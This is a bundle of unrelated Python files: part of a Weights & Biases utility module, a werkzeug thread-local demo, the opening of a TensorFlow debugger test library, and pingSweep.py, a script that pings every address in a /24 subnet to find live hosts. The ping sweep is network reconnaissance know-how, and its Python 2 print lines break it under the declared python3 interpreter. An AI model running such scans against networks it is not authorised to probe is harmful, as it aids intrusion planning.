if isinstance(obj, float) and math.isnan(obj):
obj = None
elif isinstance(obj, np.generic) and obj.dtype.kind == "f":
# obj is a numpy float with precision greater than that of native python float
# (i.e., float96 or float128). in this case obj.item() does not return a native
# python float to avoid loss of precision, so we need to explicitly cast this
# down to a 64bit float
obj = float(obj)
elif isinstance(obj, bytes):
obj = obj.decode("utf-8")
elif isinstance(obj, (datetime, date)):
obj = obj.isoformat()
elif callable(obj):
obj = (
"{}.{}".format(obj.__module__, obj.__qualname__)
if hasattr(obj, "__qualname__") and hasattr(obj, "__module__")
else str(obj)
)
elif isinstance(obj, float) and math.isnan(obj):
obj = None
else:
converted = False
if getsizeof(obj) > VALUE_BYTES_LIMIT:
wandb.termwarn(
"Serializing object of type {} that is {} bytes".format(
type(obj).__name__, getsizeof(obj)
)
)
return obj, converted
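def _json_friendly_example():
    # Illustrative sketch (added for clarity, not part of the original module): a
    # one-element numpy array collapses to a scalar and is reported as converted.
    if np:
        value, converted = json_friendly(np.array([1.5]))
        assert converted and value == 1.5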
def json_friendly_val(val):
"""Make any value (including dict, slice, sequence, etc) JSON friendly"""
if isinstance(val, dict):
converted = {}
for key, value in six.iteritems(val):
converted[key] = json_friendly_val(value)
return converted
if isinstance(val, slice):
converted = dict(
slice_start=val.start, slice_step=val.step, slice_stop=val.stop
)
return converted
val, _ = json_friendly(val)
if isinstance(val, Sequence) and not isinstance(val, six.string_types):
converted = []
for value in val:
converted.append(json_friendly_val(value))
return converted
else:
if val.__class__.__module__ not in ("builtins", "__builtin__"):
val = str(val)
return val
def convert_plots(obj):
if is_matplotlib_typename(get_full_typename(obj)):
tools = get_module(
"plotly.tools",
required="plotly is required to log interactive plots, install with: pip install plotly or convert the plot to an image with `wandb.Image(plt)`",
)
obj = tools.mpl_to_plotly(obj)
if is_plotly_typename(get_full_typename(obj)):
return {"_type": "plotly", "plot": obj.to_plotly_json()}
else:
return obj
def maybe_compress_history(obj):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return wandb.Histogram(obj, num_bins=32).to_json(), True
else:
return obj, False
def maybe_compress_summary(obj, h5_typename):
if np and isinstance(obj, np.ndarray) and obj.size > 32:
return (
{
"_type": h5_typename, # may not be ndarray
"var": np.var(obj).item(),
"mean": np.mean(obj).item(),
"min": np.amin(obj).item(),
"max": np.amax(obj).item(),
"10%": np.percentile(obj, 10),
"25%": np.percentile(obj, 25),
"75%": np.percentile(obj, 75),
"90%": np.percentile(obj, 90),
"size": obj.size,
},
True,
)
else:
return obj, False
def launch_browser(attempt_launch_browser=True):
"""Decide if we should launch a browser"""
_DISPLAY_VARIABLES = ["DISPLAY", "WAYLAND_DISPLAY", "MIR_SOCKET"]
_WEBBROWSER_NAMES_BLACKLIST = ["www-browser", "lynx", "links", "elinks", "w3m"]
import webbrowser
launch_browser = attempt_launch_browser
if launch_browser:
if "linux" in sys.platform and not any(
os.getenv(var) for var in _DISPLAY_VARIABLES
):
launch_browser = False
try:
browser = webbrowser.get()
if hasattr(browser, "name") and browser.name in _WEBBROWSER_NAMES_BLACKLIST:
launch_browser = False
except webbrowser.Error:
launch_browser = False
return launch_browser
def generate_id(length=8):
# ~3t run ids (36**8)
run_gen = shortuuid.ShortUUID(alphabet=list("0123456789abcdefghijklmnopqrstuvwxyz"))
return run_gen.random(length)
def parse_tfjob_config():
"""Attempts to parse TFJob config, returning False if it can't find it"""
if os.getenv("TF_CONFIG"):
try:
return json.loads(os.environ["TF_CONFIG"])
except ValueError:
return False
else:
return False
class WandBJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types."""
def default(self, obj):
if hasattr(obj, "json_encode"):
return obj.json_encode()
# if hasattr(obj, 'to_json'):
# return obj.to_json()
tmp_obj, converted = json_friendly(obj)
if converted:
return tmp_obj
return json.JSONEncoder.default(self, obj)
class WandBJSONEncoderOld(json.JSONEncoder):
"""A JSON Encoder that handles some extra types."""
def default(self, obj):
tmp_obj, converted = json_friendly(obj)
tmp_obj, compressed = maybe_compress_summary(tmp_obj, get_h5_typename(obj))
if converted:
return tmp_obj
return json.JSONEncoder.default(self, tmp_obj)
class WandBHistoryJSONEncoder(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
obj, converted = json_friendly(obj)
obj, compressed = maybe_compress_history(obj)
if converted:
return obj
return json.JSONEncoder.default(self, obj)
class JSONEncoderUncompressed(json.JSONEncoder):
"""A JSON Encoder that handles some extra types.
This encoder turns numpy like objects with a size > 32 into histograms"""
def default(self, obj):
if is_numpy_array(obj):
return obj.tolist()
elif np and isinstance(obj, np.generic):
obj = obj.item()
return json.JSONEncoder.default(self, obj)
def json_dump_safer(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=WandBJSONEncoder, **kwargs)
def json_dumps_safer(obj, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dumps(obj, cls=WandBJSONEncoder, **kwargs)
# This is used for dumping raw json into files
def json_dump_uncompressed(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=JSONEncoderUncompressed, **kwargs)
def json_dumps_safer_history(obj, **kwargs):
"""Convert obj to json, with some extra encodable types, including histograms"""
return json.dumps(obj, cls=WandBHistoryJSONEncoder, **kwargs)
def make_json_if_not_number(v):
"""If v is not a basic type convert it to json."""
if isinstance(v, (float, int)):
return v
return json_dumps_safer(v)
def make_safe_for_json(obj):
"""Replace invalid json floats with strings. Also converts to lists and dicts."""
if isinstance(obj, Mapping):
return {k: make_safe_for_json(v) for k, v in obj.items()}
elif isinstance(obj, str):
# str's are Sequence, so we need to short-circuit
return obj
elif isinstance(obj, Sequence):
return [make_safe_for_json(v) for v in obj]
elif isinstance(obj, float):
# W&B backend and UI handle these strings
if obj != obj: # standard way to check for NaN
return "NaN"
elif obj == float("+inf"):
return "Infinity"
elif obj == float("-inf"):
return "-Infinity"
return obj
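def _make_safe_for_json_example():
    # Illustrative sketch (added for clarity, not part of the original module): NaN and
    # infinities become the strings the W&B backend expects; containers are rebuilt.
    safe = make_safe_for_json({"loss": float("nan"), "scores": [1.0, float("inf")]})
    assert safe == {"loss": "NaN", "scores": [1.0, "Infinity"]}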
def mkdir_exists_ok(path):
try:
os.makedirs(path)
return True
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
return False
else:
raise
def no_retry_auth(e):
if hasattr(e, "exception"):
e = e.exception
if not isinstance(e, requests.HTTPError):
return True
if e.response is None:
return True
# Don't retry bad request errors; raise immediately
if e.response.status_code in (400, 409):
return False
# Retry all non-forbidden/unauthorized/not-found errors.
if e.response.status_code not in (401, 403, 404):
return True
# Crash w/message on forbidden/unauthorized errors.
if e.response.status_code == 401:
raise CommError("Invalid or missing api_key. Run wandb login")
elif wandb.run:
raise CommError("Permission denied to access {}".format(wandb.run.path))
else:
raise CommError("Permission denied, ask the project owner to grant you access")
def find_runner(program):
"""Return a command that will run program.
Arguments:
program: The string name of the program to try to run.
Returns:
commandline list of strings to run the program (eg. with subprocess.call()) or None
"""
if os.path.isfile(program) and not os.access(program, os.X_OK):
# program is a path to a non-executable file
try:
opened = open(program)
except IOError: # PermissionError doesn't exist in 2.7
return None
first_line = opened.readline().strip()
if first_line.startswith("#!"):
return shlex.split(first_line[2:])
if program.endswith(".py"):
return [sys.executable]
return None
def downsample(values, target_length):
"""Downsamples 1d values to target_length, including start and end.
Algorithm just rounds index down.
Values can be any sequence, including a generator.
"""
assert target_length > 1
values = list(values)
if len(values) < target_length:
return values
ratio = float(len(values) - 1) / (target_length - 1)
result = []
for i in range(target_length):
result.append(values[int(i * ratio)])
return result
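def _downsample_example():
    # Illustrative sketch (added for clarity, not part of the original module): the
    # first and last values are always kept, intermediate indices are rounded down.
    assert downsample(list(range(10)), 4) == [0, 3, 6, 9]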
def has_num(dictionary, key):
return key in dictionary and isinstance(dictionary[key], numbers.Number)
def md5_file(path):
hash_md5 = hashlib.md5()
with open(path, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return base64.b64encode(hash_md5.digest()).decode("ascii")
def get_log_file_path():
"""Log file path used in error messages.
It would probably be better if this pointed to a log file in a
run directory.
"""
# TODO(jhr, cvp): refactor
if wandb.run:
return wandb.run._settings.log_internal
return os.path.join("wandb", "debug-internal.log")
def docker_image_regex(image):
"regex for valid docker image names"
if image:
return re.match(
r"^(?:(?=[^:\/]{1,253})(?!-)[a-zA-Z0-9-]{1,63}(?<!-)(?:\.(?!-)[a-zA-Z0-9-]{1,63}(?<!-))*(?::[0-9]{1,5})?/)?((?![._-])(?:[a-z0-9._-]*)(?<![._-])(?:/(?![._-])[a-z0-9._-]*(?<![._-]))*)(?::(?![.-])[a-zA-Z0-9_.-]{1,128})?$",
image,
)
def image_from_docker_args(args):
"""This scans docker run args and attempts to find the most likely docker image argument.
    It excludes any arguments that start with a dash, and the argument after it if it isn't a boolean
    switch. This can be improved; we currently fall back gracefully when this fails.
"""
bool_args = [
"-t",
"--tty",
"--rm",
"--privileged",
"--oom-kill-disable",
"--no-healthcheck",
"-i",
"--interactive",
"--init",
"--help",
"--detach",
"-d",
"--sig-proxy",
"-it",
"-itd",
]
last_flag = -2
last_arg = ""
possible_images = []
if len(args) > 0 and args[0] == "run":
args.pop(0)
for i, arg in enumerate(args):
if arg.startswith("-"):
last_flag = i
last_arg = arg
elif "@sha256:" in arg:
# Because our regex doesn't match digests
possible_images.append(arg)
elif docker_image_regex(arg):
if last_flag == i - 2:
possible_images.append(arg)
elif "=" in last_arg:
possible_images.append(arg)
elif last_arg in bool_args and last_flag == i - 1:
possible_images.append(arg)
most_likely = None
for img in possible_images:
if ":" in img or "@" in img or "/" in img:
most_likely = img
break
    if most_likely is None and len(possible_images) > 0:
most_likely = possible_images[0]
return most_likely
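def _image_from_docker_args_example():
    # Illustrative sketch (added for clarity, not part of the original module): the
    # image reference is picked out from the surrounding flags and trailing command.
    args = ["run", "--rm", "-e", "FOO=bar", "python:3.9-slim", "python", "train.py"]
    assert image_from_docker_args(args) == "python:3.9-slim"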
def load_yaml(file):
"""If pyyaml > 5.1 use full_load to avoid warning"""
if hasattr(yaml, "full_load"):
return yaml.full_load(file)
else:
return yaml.load(file)
def image_id_from_k8s():
"""Pings the k8s metadata service for the image id. Specify the
KUBERNETES_NAMESPACE environment variable if your pods are not in
the default namespace:
- name: KUBERNETES_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
"""
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
if os.path.exists(token_path):
k8s_server = "https://{}:{}/api/v1/namespaces/{}/pods/{}".format(
os.getenv("KUBERNETES_SERVICE_HOST"),
os.getenv("KUBERNETES_PORT_443_TCP_PORT"),
os.getenv("KUBERNETES_NAMESPACE", "default"),
os.getenv("HOSTNAME"),
)
try:
res = requests.get(
k8s_server,
verify="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
timeout=3,
headers={"Authorization": "Bearer {}".format(open(token_path).read())},
)
res.raise_for_status()
except requests.RequestException:
return None
try:
return res.json()["status"]["containerStatuses"][0]["imageID"].strip(
"docker-pullable://"
)
except (ValueError, KeyError, IndexError):
logger.exception("Error checking kubernetes for image id")
return None
def async_call(target, timeout=None):
"""Accepts a method and optional timeout.
    Returns a new method that will call the original with any args, waiting for up to timeout seconds.
This new method blocks on the original and returns the result or None
if timeout was reached, along with the thread.
You can check thread.is_alive() to determine if a timeout was reached.
If an exception is thrown in the thread, we reraise it.
"""
q = queue.Queue()
def wrapped_target(q, *args, **kwargs):
try:
q.put(target(*args, **kwargs))
except Exception as e:
q.put(e)
def wrapper(*args, **kwargs):
thread = threading.Thread(
target=wrapped_target, args=(q,) + args, kwargs=kwargs
)
thread.daemon = True
thread.start()
try:
result = q.get(True, timeout)
if isinstance(result, Exception):
six.reraise(type(result), result, sys.exc_info()[2])
return result, thread
except queue.Empty:
return None, thread
return wrapper
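def _async_call_example():
    # Illustrative sketch (added for clarity, not part of the original module): wrap a
    # slow callable and give up after 0.1 seconds; the result is None on timeout and
    # thread.is_alive() tells us the call was abandoned rather than finished.
    slow = async_call(lambda: time.sleep(1) or "done", timeout=0.1)
    result, thread = slow()
    return result is None and thread.is_alive()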
def read_many_from_queue(q, max_items, queue_timeout):
try:
item = q.get(True, queue_timeout)
except queue.Empty:
return []
items = [item]
for i in range(max_items):
try:
item = q.get_nowait()
except queue.Empty:
return items
items.append(item)
return items
def stopwatch_now():
"""Get a timevalue for interval comparisons
When possible it is a monotonic clock to prevent backwards time issues.
"""
if six.PY2:
now = time.time()
else:
now = time.monotonic()
return now
def class_colors(class_count):
# make class 0 black, and the rest equally spaced fully saturated hues
return [[0, 0, 0]] + [
colorsys.hsv_to_rgb(i / (class_count - 1.0), 1.0, 1.0)
for i in range(class_count - 1)
]
def _prompt_choice(input_timeout: int = None, jupyter: bool = False,) -> str:
input_fn = input
prompt = term.LOG_STRING
if input_timeout:
# delayed import to mitigate risk of timed_input complexity
from wandb.sdk.lib import timed_input
input_fn = functools.partial(timed_input.timed_input, timeout=input_timeout)
        # timed_input doesn't handle enhanced prompts
if platform.system() == "Windows":
prompt = "wandb"
text = f"{prompt}: Enter your choice: "
if input_fn == input:
choice = input_fn(text)
else:
choice = input_fn(text, jupyter=jupyter)
return choice
def prompt_choices(
choices, allow_manual=False, input_timeout: int = None, jupyter: bool = False,
):
"""Allow a user to choose from a list of options"""
for i, choice in enumerate(choices):
wandb.termlog("(%i) %s" % (i + 1, choice))
idx = -1
while idx < 0 or idx > len(choices) - 1:
choice = _prompt_choice(input_timeout=input_timeout, jupyter=jupyter)
if not choice:
continue
idx = -1
try:
idx = int(choice) - 1
except ValueError:
pass
if idx < 0 or idx > len(choices) - 1:
wandb.termwarn("Invalid choice")
result = choices[idx]
wandb.termlog("You chose '%s'" % result)
return result
def guess_data_type(shape, risky=False):
"""Infer the type of data based on the shape of the tensors
Arguments:
risky(bool): some guesses are more likely to be wrong.
"""
# (samples,) or (samples,logits)
if len(shape) in (1, 2):
return "label"
# Assume image mask like fashion mnist: (no color channel)
# This is risky because RNNs often have 3 dim tensors: batch, time, channels
if risky and len(shape) == 3:
return "image"
if len(shape) == 4:
if shape[-1] in (1, 3, 4):
# (samples, height, width, Y \ RGB \ RGBA)
return "image"
else:
# (samples, height, width, logits)
return "segmentation_mask"
return None
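def _guess_data_type_example():
    # Illustrative sketch (added for clarity, not part of the original module): NHWC
    # batches with 1/3/4 channels are guessed to be images, 2-d logits to be labels.
    assert guess_data_type((32, 28, 28, 3)) == "image"
    assert guess_data_type((32, 10)) == "label"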
def download_file_from_url(dest_path, source_url, api_key=None):
response = requests.get(source_url, auth=("api", api_key), stream=True, timeout=5)
response.raise_for_status()
if os.sep in dest_path:
mkdir_exists_ok(os.path.dirname(dest_path))
with fsync_open(dest_path, "wb") as file:
for data in response.iter_content(chunk_size=1024):
file.write(data)
def isatty(ob):
return hasattr(ob, "isatty") and ob.isatty()
def to_human_size(bytes, units=None):
units = units or POW_10_BYTES
unit, value = units[0]
factor = round(float(bytes) / value, 1)
return (
"{}{}".format(factor, unit)
if factor < 1024 or len(units) == 1
else to_human_size(bytes, units[1:])
)
def from_human_size(size, units=None):
units = {unit.upper(): value for (unit, value) in units or POW_10_BYTES}
regex = re.compile(
r"(\d+\.?\d*)\s*({})?".format("|".join(units.keys())), re.IGNORECASE
)
match = re.match(regex, size)
if not match:
raise ValueError("Size must be of the form `10`, `10B` or `10 B`.")
factor, unit = (
float(match.group(1)),
units[match.group(2).upper()] if match.group(2) else 1,
)
return int(factor * unit)
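def _human_size_example():
    # Illustrative sketch (added for clarity, not part of the original module): the two
    # helpers round-trip decimal sizes ("KB" means 10**3 bytes with the default units).
    assert to_human_size(1500) == "1.5KB"
    assert from_human_size("1.5KB") == 1500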
def auto_project_name(program):
# if we're in git, set project name to git repo name + relative path within repo
root_dir = wandb.wandb_sdk.lib.git.GitRepo().root_dir
if root_dir is None:
return "uncategorized"
# On windows, GitRepo returns paths in unix style, but os.path is windows
# style. Coerce here.
root_dir = to_native_slash_path(root_dir)
repo_name = os.path.basename(root_dir)
if program is None:
return repo_name
if not os.path.isabs(program):
program = os.path.join(os.curdir, program)
prog_dir = os.path.dirname(os.path.abspath(program))
if not prog_dir.startswith(root_dir):
return repo_name
project = repo_name
sub_path = os.path.relpath(prog_dir, root_dir)
if sub_path != ".":
project += "-" + sub_path
return project.replace(os.sep, "_")
def parse_sweep_id(parts_dict):
"""In place parse sweep path from parts dict.
Arguments:
parts_dict (dict): dict(entity=,project=,name=). Modifies dict inplace.
Returns:
None or str if there is an error
"""
entity = None
project = None
sweep_id = parts_dict.get("name")
if not isinstance(sweep_id, six.string_types):
return "Expected string sweep_id"
sweep_split = sweep_id.split("/")
if len(sweep_split) == 1:
pass
elif len(sweep_split) == 2:
split_project, sweep_id = sweep_split
project = split_project or project
elif len(sweep_split) == 3:
split_entity, split_project, sweep_id = sweep_split
project = split_project or project
entity = split_entity or entity
else:
return (
"Expected sweep_id in form of sweep, project/sweep, or entity/project/sweep"
)
parts_dict.update(dict(name=sweep_id, project=project, entity=entity))
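# Sketch of the in-place contract (values are hypothetical):
#   parts = dict(entity=None, project=None, name="my-team/my-proj/abc123")
#   parse_sweep_id(parts)  # returns None on success
#   # parts is now {"name": "abc123", "project": "my-proj", "entity": "my-team"}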
def to_forward_slash_path(path):
if platform.system() == "Windows":
path = path.replace("\\", "/")
return path
def to_native_slash_path(path):
return path.replace("/", os.sep)
def bytes_to_hex(bytestr):
# Works in python2 / python3
return codecs.getencoder("hex")(bytestr)[0].decode("ascii")
def check_and_warn_old(files):
if "wandb-metadata.json" in files:
wandb.termwarn("These runs were logged with a previous version of wandb.")
wandb.termwarn(
"Run pip install wandb<0.10.0 to get the old library and sync your runs."
)
return True
return False
class ImportMetaHook:
def __init__(self):
self.modules = {}
self.on_import = {}
def add(self, fullname, on_import):
self.on_import.setdefault(fullname, []).append(on_import)
def install(self):
sys.meta_path.insert(0, self)
def uninstall(self):
sys.meta_path.remove(self)
def find_module(self, fullname, path=None):
if fullname in self.on_import:
return self
def load_module(self, fullname):
self.uninstall()
mod = importlib.import_module(fullname)
self.install()
self.modules[fullname] = mod
on_imports = self.on_import.get(fullname)
if on_imports:
for f in on_imports:
f()
return mod
def get_modules(self):
return tuple(self.modules)
def get_module(self, module):
return self.modules[module]
_import_hook = None
def add_import_hook(fullname, on_import):
global _import_hook
if _import_hook is None:
_import_hook = ImportMetaHook()
_import_hook.install()
_import_hook.add(fullname, on_import)
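# Usage sketch (the target module and callback are hypothetical): fire a callback
# when a given module is first imported anywhere in the process, e.g.
#   add_import_hook("torch", lambda: print("torch import observed"))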
def b64_to_hex_id(id_string):
return binascii.hexlify(base64.standard_b64decode(str(id_string))).decode("utf-8")
def hex_to_b64_id(encoded_string):
return base64.standard_b64encode(binascii.unhexlify(encoded_string)).decode("utf-8")
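# These two helpers are inverses for a canonically padded base64 id (the id below
# is a made-up example, not a real wandb id):
#   hex_id = b64_to_hex_id("UnVuOnYxOmFiYw==")   # -> hex of the decoded bytes
#   assert hex_to_b64_id(hex_id) == "UnVuOnYxOmFiYw=="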
def host_from_path(path):
"""returns the host of the path"""
url = urllib.parse.urlparse(path)
return url.netloc
def uri_from_path(path):
"""returns the URI of the path"""
url = urllib.parse.urlparse(path)
return url.path if url.path[0] != "/" else url.path[1:]
def is_unicode_safe(stream):
"""returns true if the stream supports UTF-8"""
if not hasattr(stream, "encoding"):
return False
return stream.encoding == "UTF-8"
def _has_internet():
"""Attempts to open a DNS connection to Googles root servers"""
try:
s = socket.create_connection(("8.8.8.8", 53), 0.5)
s.close()
return True
except OSError:
return False
def rand_alphanumeric(length=8, rand=None):
# NOTE: despite the name, this draws only from hexadecimal characters (0-9, A-F).
rand = rand or random
return "".join(rand.choice("0123456789ABCDEF") for _ in range(length))
@contextlib.contextmanager
def fsync_open(path, mode="w"):
"""
Opens a path for I/O, guaranteeing that the file is flushed and
fsynced when the file's context expires.
"""
with open(path, mode) as f:
yield f
f.flush()
os.fsync(f.fileno())
def _is_kaggle():
return (
os.getenv("KAGGLE_KERNEL_RUN_TYPE") is not None
or "kaggle_environments" in sys.modules # noqa: W503
)
def is_numeric_array(array):
return np.asarray(array).dtype.kind in NUMERIC_KINDS
def _is_likely_kaggle():
# Telemetry to mark first runs from Kagglers.
return (
_is_kaggle()
or os.path.exists(
os.path.expanduser(os.path.join("~", ".kaggle", "kaggle.json"))
)
or "kaggle" in sys.modules
)
def _is_databricks():
# check if we are running inside a databricks notebook by
# inspecting sys.modules, searching for dbutils and verifying that
# it has the appropriate structure
if "dbutils" in sys.modules:
dbutils = sys.modules["dbutils"]
if hasattr(dbutils, "shell"):
shell = dbutils.shell
if hasattr(shell, "sc"):
sc = shell.sc
return sc.appName == "Databricks Shell"
return False
def sweep_config_err_text_from_jsonschema_violations(violations):
"""Consolidate violation strings from wandb/sweeps describing the ways in which a
sweep config violates the allowed schema as a single string.
Parameters
----------
violations: list of str
The warnings to render.
Returns
-------
violation: str
The consolidated violation text.
"""
violation_base = (
"Malformed sweep config detected! This may cause your sweep to behave in unexpected ways.\n"
"To avoid this, please fix the sweep config schema violations below:"
)
for i, warning in enumerate(violations):
violations[i] = " Violation {}. {}".format(i + 1, warning)
violation = "\n".join([violation_base] + violations)
return violation
def handle_sweep_config_violations(warnings):
"""Render warnings from gorilla describing the ways in which a
sweep config violates the allowed schema as terminal warnings.
Parameters
----------
warnings: list of str
The warnings to render.
"""
warning = sweep_config_err_text_from_jsonschema_violations(warnings)
if len(warnings) > 0:
term.termwarn(warning)
def _log_thread_stacks():
"""Log all threads, useful for debugging."""
thread_map = dict((t.ident, t.name) for t in threading.enumerate())
for thread_id, frame in sys._current_frames().items():
logger.info(
"\n--- Stack for thread {t} {name} ---".format(
t=thread_id, name=thread_map.get(thread_id, "unknown")
)
)
for filename, lineno, name, line in traceback.extract_stack(frame):
logger.info(' File: "%s", line %d, in %s' % (filename, lineno, name))
if line:
logger.info(" Line: %s" % line)
def check_windows_valid_filename(path):
return not bool(re.search(RE_WINFNAMES, path))
def artifact_to_json(artifact) -> Dict[str, Any]:
# public.Artifact instances have _sequence_name; wandb.Artifact instances
# only expose name, so derive the sequence name by splitting it.
if hasattr(artifact, "_sequence_name"):
sequence_name = artifact._sequence_name
else:
sequence_name = artifact.name.split(":")[0]
return {
"_type": "artifactVersion",
"_version": "v0",
"id": artifact.id,
"version": artifact.version,
"sequenceName": sequence_name,
"usedAs": artifact._use_as,
}
def check_dict_contains_nested_artifact(d, nested=False):
if isinstance(d, dict):
for _, item in six.iteritems(d):
if isinstance(item, dict):
contains_artifacts = check_dict_contains_nested_artifact(item, True)
if contains_artifacts:
return True
elif (
isinstance(item, wandb.Artifact)
or isinstance(item, wandb.apis.public.Artifact)
) and nested:
return True
return False
|
pingSweep.py
|
#!/usr/bin/env python3
__author__ = "donutsThatsHowWeGetAnts"
__copyright__ = "Copyright (c) 2018 donutsThatsHowWeGetAnts"
__credits__ = [ "donutsThatsHowWeGetAnts" ]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "donutsThatsHowWeGetAnts"
__email__ = "None"
__status__ = "Production"
import multiprocessing
import subprocess
import os
import sys
def ping( j, r ):
DNULL = open(os.devnull, 'w')
while True:
ip = j.get()
if ip is None:
break
try:
subprocess.check_call(['ping', '-c1', ip], stdout=DNULL)
r.put(ip)
except subprocess.CalledProcessError:
# host did not respond to the ping; skip it
pass
def valid_ip(s):
a = s.split('.')
if len(a) != 3:
return False
for i in a:
if not i.isdigit():
return False
octet = int(i)
if octet < 0 or octet > 255:
return False
return True
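# Note: this intentionally validates a three-octet /24 prefix, not a full address:
#   valid_ip("10.11.1")   -> True
#   valid_ip("10.11.1.5") -> False (four octets)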
if __name__ == "__main__":
if valid_ip(sys.argv[1]):
size = 255
jobs = multiprocessing.Queue()
results = multiprocessing.Queue()
pool = [ multiprocessing.Process(target=ping, args=(jobs, results))
for i in range(size) ]
for p in pool:
p.start()
for i in range(1,255):
jobs.put(sys.argv[1] + ".{0}".format(i))
for p in pool:
jobs.put(None)
for p in pool:
p.join()
while not results.empty():
ip = results.get()
print(ip)
else:
print "Usage: " + sys.argv[0] + " IP"
print "Example: " + sys.argv[0] + " 10.11.1"
|
test2.py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: test2
Description : Thread isolation using werkzeug's Local object
Author : pengsheng
date: 2019-04-20
-------------------------------------------------
"""
import threading
import time
from werkzeug.local import Local
new_obj = Local()
new_obj.name = '张三'
def worker():
new_obj.name = '张三风'
print('new thread name = ' + new_obj.name)
new_thread = threading.Thread(target=worker, name='new thread')
new_thread.start()
time.sleep(1)
print('main thread name = ' + new_obj.name)
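# Expected output: the reassignment inside the worker thread stays local to that
# thread, so the main thread still sees its own value:
#   new thread name = 张三风
#   main thread name = 张三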
|
session_debug_testlib.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for debugger functionalities in tf.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import glob
import os
import shutil
import tempfile
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
import tensorflow.python.ops.tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.platform import googletest
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
class _RNNCellForTest(rnn_cell_impl.RNNCell):
"""RNN cell for testing."""
def __init__(self, input_output_size, state_size):
self._input_output_size = input_output_size
self._state_size = state_size
self._w = variables.Variable(1.0, dtype=dtypes.float32, name="w")
@property
def output_size(self):
return self._input_output_size
@property
def state_size(self):
return self._state_size
def __call__(self, input_, state, scope=None):
return (math_ops.multiply(self._w, input_), state)
class SessionDebugTestBase(test_util.TensorFlowTestCase):
"""Base class for unit tests of tfdbg running with tf.Session."""
@classmethod
def setUpClass(cls):
if test.is_gpu_available():
cls._expected_partition_graph_count = 2
cls._expected_num_devices = 2
gpu_name = test_util.gpu_device_name()
cls._main_device = "/job:localhost/replica:0/task:0" + gpu_name
else:
cls._expected_partition_graph_count = 1
cls._expected_num_devices = 1
cls._main_device = "/job:localhost/replica:0/task:0/cpu:0"
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
self._dump_root = tempfile.mkdtemp()
def tearDown(self):
ops.reset_default_graph()
# Tear down temporary dump directory.
if os.path.isdir(self._dump_root):
shutil.rmtree(self._dump_root)
def _debug_urls(self, run_number=None):
raise NotImplementedError(
"_debug_urls() method is not implemented in the base test class.")
def _debug_dump_dir(self, run_number=None):
raise NotImplementedError(
"_debug_dump_dir() method is not implemented in the base test class.")
def _debug_run_and_get_dump(self,
sess,
fetches,
feed_dict=None,
debug_ops="DebugIdentity",
tolerate_debug_op_creation_failures=False,
global_step=-1,
validate=True,
expected_partition_graph_count=None):
"""Run fetches with debugging and obtain DebugDumpDir.
Args:
sess: the tf.Session to be used.
fetches: fetches of the Session.run().
feed_dict: feed dict for the Session.run().
debug_ops: name(s) of the debug ops to be used.
tolerate_debug_op_creation_failures: whether to tolerate debug op
creation failures.
global_step: Optional global step.
validate: whether to validate dumped tensors against graph.
expected_partition_graph_count: optional count of partition graphs to
assert on.
Returns:
1. Return values of the Session.run().
2. The DebugDumpDir object from the debugged run().
"""
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=debug_ops,
debug_urls=self._debug_urls(),
tolerate_debug_op_creation_failures=tolerate_debug_op_creation_failures,
global_step=global_step)
run_metadata = config_pb2.RunMetadata()
run_output = sess.run(fetches,
feed_dict=feed_dict,
options=run_options,
run_metadata=run_metadata)
if expected_partition_graph_count is not None:
self.assertEqual(expected_partition_graph_count,
len(run_metadata.partition_graphs))
return run_output, debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs,
validate=validate)
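# Typical call pattern in the tests below (sketch; "fetch" stands for whatever op
# a given test builds):
#   result, dump = self._debug_run_and_get_dump(sess, fetch, debug_ops=["DebugIdentity"])
#   self.assertTrue(dump.loaded_partition_graphs())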
def _generate_dump_from_simple_addition_graph(self):
with session.Session() as sess:
u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
v_init_val = np.array([[2.0], [-1.0]])
# Use node names with overlapping namespace (i.e., parent directory) to
# test concurrent, non-racing directory creation.
u_name = "u"
v_name = "v"
w_name = "w"
u_init = constant_op.constant(u_init_val, shape=[2, 2])
u = variables.Variable(u_init, name=u_name)
v_init = constant_op.constant(v_init_val, shape=[2, 1])
v = variables.Variable(v_init, name=v_name)
